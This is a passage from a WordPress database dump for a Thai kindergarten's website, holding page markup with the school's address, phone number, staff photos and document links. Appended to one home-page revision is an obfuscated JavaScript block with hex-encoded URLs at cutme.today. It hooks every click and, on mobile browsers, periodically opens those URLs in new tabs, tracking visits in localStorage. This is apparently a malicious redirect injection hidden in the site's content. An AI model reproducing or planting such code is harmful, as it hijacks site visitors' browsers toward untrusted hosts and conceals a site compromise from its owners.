style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 10:35:18','2024-09-24 03:35:18','',19,'http://watprato.ssk.in.th/?p=405',0,'revision','',0),
(406,2,'2024-09-24 10:36:59','2024-09-24 03:36:59','','รองผู้อำนวยการ1','','inherit','open','closed','','%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a31','','','2024-09-24 10:36:59','2024-09-24 03:36:59','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `wp_posts` VALUES
(407,2,'2024-09-24 10:37:06','2024-09-24 03:37:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":5,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group 